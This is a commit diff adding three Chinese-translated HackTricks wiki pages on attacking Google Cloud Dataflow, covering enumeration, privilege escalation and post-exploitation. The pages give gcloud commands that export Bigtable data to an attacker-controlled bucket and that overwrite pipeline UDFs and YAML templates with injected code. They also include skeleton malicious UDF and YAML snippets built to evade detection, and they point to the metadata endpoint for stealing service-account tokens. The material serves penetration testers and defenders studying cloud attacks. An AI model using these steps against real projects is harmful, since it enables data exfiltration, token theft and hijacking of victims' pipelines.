mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-03-12 21:22:57 -07:00
Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/
This commit is contained in:
@@ -0,0 +1,53 @@
|
||||
# GCP - Dataflow Post Exploitation
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Dataflow
|
||||
|
||||
欲了解有关 Dataflow 的更多信息,请参阅:
|
||||
|
||||
{{#ref}}
|
||||
../gcp-services/gcp-dataflow-enum.md
|
||||
{{#endref}}
|
||||
|
||||
### 使用 Dataflow 来 exfiltrate 来自其他服务的数据
|
||||
|
||||
**权限:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`(针对拥有对源和 sink 访问权限的 SA)
|
||||
|
||||
拥有 Dataflow 作业创建权限后,你可以使用 GCP Dataflow 模板将 Bigtable、BigQuery、Pub/Sub 等服务的数据导出到攻击者控制的 GCS 桶中。当你获得 Dataflow 访问权限时(例如通过 [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation(通过 bucket 写入接管 pipeline)),这是一个强大的 post-exploitation 技术。
|
||||
|
||||
> [!NOTE]
|
||||
> 你需要对具有足够权限以读取源并写入 sink 的 service account (SA) 拥有 `iam.serviceAccounts.actAs`。默认情况下,如果未指定,将使用 Compute Engine 默认 SA。
|
||||
|
||||
#### Bigtable to GCS
|
||||
|
||||
参见 [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" 获取完整模式。 模板:`Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
|
||||
|
||||
<details>
|
||||
|
||||
<summary>将 Bigtable 导出到攻击者控制的 bucket</summary>
|
||||
```bash
|
||||
gcloud dataflow jobs run <job-name> \
|
||||
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
|
||||
--project=<PROJECT> \
|
||||
--region=<REGION> \
|
||||
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
|
||||
--staging-location=gs://<YOUR_BUCKET>/staging/
|
||||
```
|
||||
</details>
|
||||
|
||||
#### BigQuery 到 GCS
|
||||
|
||||
Dataflow templates exist to export BigQuery data. 使用适合目标格式(JSON、Avro 等)的模板,并将输出指向你的存储桶。
|
||||
|
||||
#### Pub/Sub 和流式来源
|
||||
|
||||
流式管道可以从 Pub/Sub(或其他来源)读取并写入到 GCS。使用一个从目标 Pub/Sub 订阅读取并写入到你控制的存储桶的模板来启动作业。
|
||||
|
||||
## 参考
|
||||
|
||||
- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
|
||||
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
|
||||
- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
@@ -0,0 +1,172 @@
|
||||
# GCP - Dataflow Privilege Escalation
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Dataflow
|
||||
|
||||
{{#ref}}
|
||||
../gcp-services/gcp-dataflow-enum.md
|
||||
{{#endref}}
|
||||
|
||||
### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
|
||||
|
||||
Dataflow 不验证存储在 GCS 中的 UDFs 和 job template YAML 的完整性。
|
||||
如果拥有 bucket 的写权限,你可以覆盖这些文件以注入代码、在 worker 上执行代码、窃取 service account tokens,或更改数据处理流程。批处理和流式 pipeline 作业都是此攻击的可行目标。要在 pipeline 上执行此攻击,需要在作业运行之前、运行开始的前几分钟(在作业 workers 被创建之前),或在作业运行期间在新 workers 因 autoscaling 启动之前替换 UDFs/templates。
|
||||
|
||||
**Attack vectors:**
|
||||
- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
|
||||
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
|
||||
|
||||
|
||||
> [!WARNING]
|
||||
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**。如果不做协调,exfiltration 或 token 窃取会被执行成千上万次,造成噪音、速率限制和检测。使用 **file-based coordination** 模式:在开始时检查标记文件(例如 `/tmp/pwnd.txt`)是否存在;如果存在则跳过恶意代码;如果不存在则运行 payload 并创建该文件。这样可以确保 payload **每个 worker 运行一次**,而不是每行运行一次。
|
||||
|
||||
|
||||
#### Direct exploitation via gcloud CLI
|
||||
|
||||
1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
|
||||
|
||||
<details>
|
||||
|
||||
<summary>List jobs and describe to get template path, staging location, and UDF references</summary>
|
||||
```bash
|
||||
# List jobs (optionally filter by region)
|
||||
gcloud dataflow jobs list --region=<region>
|
||||
gcloud dataflow jobs list --project=<PROJECT_ID>
|
||||
|
||||
# Describe a job to get template GCS path, staging location, and any UDF/template references
|
||||
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
|
||||
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
|
||||
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
|
||||
```
|
||||
</details>
|
||||
|
||||
2. 从 GCS 下载原始 UDF 或作业模板:
|
||||
|
||||
<details>
|
||||
|
||||
<summary>从存储桶下载 UDF 文件或 YAML 模板</summary>
|
||||
```bash
|
||||
# If job references a UDF at gs://bucket/path/to/udf.py
|
||||
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
|
||||
|
||||
# Or for a YAML job template
|
||||
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
|
||||
```
|
||||
</details>
|
||||
|
||||
3. 在本地编辑该文件:注入恶意 payload(见下方 Python UDF 或 YAML 片段),并确保使用 run-once coordination pattern。
|
||||
|
||||
4. 重新上传以覆盖原始文件:
|
||||
|
||||
<details>
|
||||
|
||||
<summary>覆盖存储桶中的 UDF 或模板</summary>
|
||||
```bash
|
||||
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
|
||||
|
||||
# Or for YAML
|
||||
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
|
||||
```
|
||||
</details>
|
||||
|
||||
5. 等待下一次 job 运行,或者(对于 streaming)触发 autoscaling(例如大量发送 pipeline 输入)以便新的 workers 启动并拉取已修改的文件。
|
||||
|
||||
#### Python UDF injection
|
||||
|
||||
如果你想让 worker exfiltrate 数据到你的 C2 server,请使用 `urllib.request` 而不是 `requests`。
|
||||
`requests` 没有预装在 classic Dataflow workers 上。
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
|
||||
```python
|
||||
import os
|
||||
import json
|
||||
import urllib.request
|
||||
from datetime import datetime
|
||||
|
||||
def _malicious_func():
|
||||
# File-based coordination: run once per worker.
|
||||
coordination_file = "/tmp/pwnd.txt"
|
||||
if os.path.exists(coordination_file):
|
||||
return
|
||||
|
||||
# malicous code goes here
|
||||
with open(coordination_file, "w", encoding="utf-8") as f:
|
||||
f.write("done")
|
||||
|
||||
def transform(line):
|
||||
# Malicous code entry point - runs per line but coordination ensures once per worker
|
||||
try:
|
||||
_malicious_func()
|
||||
except Exception:
|
||||
pass
|
||||
# ... original UDF logic follows ...
|
||||
```
|
||||
</details>
|
||||
|
||||
|
||||
#### Job template YAML injection
|
||||
|
||||
注入一个包含使用协调文件的可调用函数的 `MapToFields` 步骤。对于基于 YAML 的 pipelines,如果模板声明了 `dependencies: [requests]` 并且支持 `requests`,请使用它;否则优先使用 `urllib.request`。
|
||||
|
||||
添加清理步骤(`drop: [malicious_step]`),以便管道仍然将有效数据写入目标。
|
||||
|
||||
<details>
|
||||
|
||||
<summary>管道 YAML 中的恶意 MapToFields 步骤和清理</summary>
|
||||
```yaml
|
||||
- name: MaliciousTransform
|
||||
type: MapToFields
|
||||
input: Transform
|
||||
config:
|
||||
language: python
|
||||
fields:
|
||||
malicious_step:
|
||||
callable: |
|
||||
def extract_and_return(row):
|
||||
import os
|
||||
import json
|
||||
from datetime import datetime
|
||||
coordination_file = "/tmp/pwnd.txt"
|
||||
if os.path.exists(coordination_file):
|
||||
return True
|
||||
try:
|
||||
import urllib.request
|
||||
# malicious code goes here
|
||||
with open(coordination_file, "w", encoding="utf-8") as f:
|
||||
f.write("done")
|
||||
except Exception:
|
||||
pass
|
||||
return True
|
||||
append: true
|
||||
- name: CleanupTransform
|
||||
type: MapToFields
|
||||
input: MaliciousTransform
|
||||
config:
|
||||
fields: {}
|
||||
append: true
|
||||
drop:
|
||||
- malicious_step
|
||||
```
|
||||
</details>
|
||||
|
||||
### Compute Engine 对 Dataflow Workers 的访问
|
||||
|
||||
**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
|
||||
|
||||
Dataflow workers 作为 Compute Engine VMs 运行。通过 OS Login 或 SSH 访问 workers 可以让你从元数据端点读取 SA tokens(`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`)、操作数据,或运行任意代码。
|
||||
|
||||
For exploitation details, see:
|
||||
- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
|
||||
|
||||
## References
|
||||
|
||||
- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
|
||||
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
|
||||
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
|
||||
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
|
||||
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
@@ -0,0 +1,81 @@
|
||||
# GCP - Dataflow Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## 基本信息
|
||||
|
||||
**Google Cloud Dataflow** 是一个用于 **批处理和流式数据处理** 的完全托管服务。它使组织能够构建在大规模上转换和分析数据的管道,并与 Cloud Storage、BigQuery、Pub/Sub 和 Bigtable 集成。Dataflow pipelines 在你的项目中的 worker VMs 上运行;templates 和 User-Defined Functions (UDFs) 通常存储在 GCS 存储桶中。 [Learn more](https://cloud.google.com/dataflow).
|
||||
|
||||
## 组件
|
||||
|
||||
一个 Dataflow pipeline 通常包括:
|
||||
|
||||
**Template:** YAML 或 JSON 定义(以及用于 flex templates 的 Python/Java 代码),存储在 GCS 中,用于定义 pipeline 的结构和步骤。
|
||||
|
||||
**Launcher (Flex Templates):** 启动 Flex Template 时可能会使用短期存在的 Compute Engine 实例,以在作业运行前验证模板并准备容器。
|
||||
|
||||
**Workers:** 执行实际数据处理任务的 Compute Engine VMs,会从模板中拉取 UDFs 和指令。
|
||||
|
||||
**Staging/Temp buckets:** 用于存储临时 pipeline 数据、作业制品、UDF 文件、flex template 元数据(`.json`)的 GCS 存储桶。
|
||||
|
||||
## 批处理与流式作业
|
||||
|
||||
Dataflow 支持两种执行模式:
|
||||
|
||||
**Batch jobs:** 处理固定、有界的数据集(例如日志文件、表导出)。作业运行一次直到完成然后终止。Workers 会在作业期间创建并在完成后关闭。Batch jobs 通常用于 ETL、历史分析或计划的数据迁移。
|
||||
|
||||
**Streaming jobs:** 处理无界、持续到达的数据(例如 Pub/Sub 消息、实时传感器数据)。作业会持续运行直到被显式停止。Workers 可能会根据 autoscaling 动态扩缩;新的 workers 在启动时会从 GCS 拉取 pipeline 组件(templates、UDFs)。
|
||||
|
||||
## 枚举
|
||||
|
||||
可以枚举 Dataflow 作业和相关资源以收集服务账号、模板路径、暂存桶和 UDF 存放位置。
|
||||
|
||||
### 作业枚举
|
||||
|
||||
要枚举 Dataflow 作业并检索其详细信息:
|
||||
```bash
|
||||
# List Dataflow jobs in the project
|
||||
gcloud dataflow jobs list
|
||||
# List Dataflow jobs (by region)
|
||||
gcloud dataflow jobs list --region=<region>
|
||||
|
||||
# Describe job (includes service account, template GCS path, staging location, parameters)
|
||||
gcloud dataflow jobs describe <job-id> --region=<region>
|
||||
```
|
||||
Job 描述会显示模板的 GCS 路径、staging location 和 worker service account——有助于识别存放 pipeline components 的 bucket。
|
||||
|
||||
### 模板和 Bucket 枚举
|
||||
|
||||
Job 描述中引用的 bucket 可能包含 flex templates、UDFs 或 YAML pipeline 定义:
|
||||
```bash
|
||||
# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
|
||||
gcloud storage ls gs://<bucket>/
|
||||
|
||||
# List objects recursively
|
||||
gcloud storage ls gs://<bucket>/**
|
||||
```
|
||||
## Privilege Escalation
|
||||
|
||||
{{#ref}}
|
||||
../gcp-privilege-escalation/gcp-dataflow-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
## Post Exploitation
|
||||
|
||||
{{#ref}}
|
||||
../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
|
||||
{{#endref}}
|
||||
|
||||
## Persistence
|
||||
|
||||
{{#ref}}
|
||||
../gcp-persistence/gcp-dataflow-persistence.md
|
||||
{{#endref}}
|
||||
|
||||
## 参考资料
|
||||
|
||||
- [Dataflow overview](https://cloud.google.com/dataflow)
|
||||
- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
|
||||
- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
Reference in New Issue
Block a user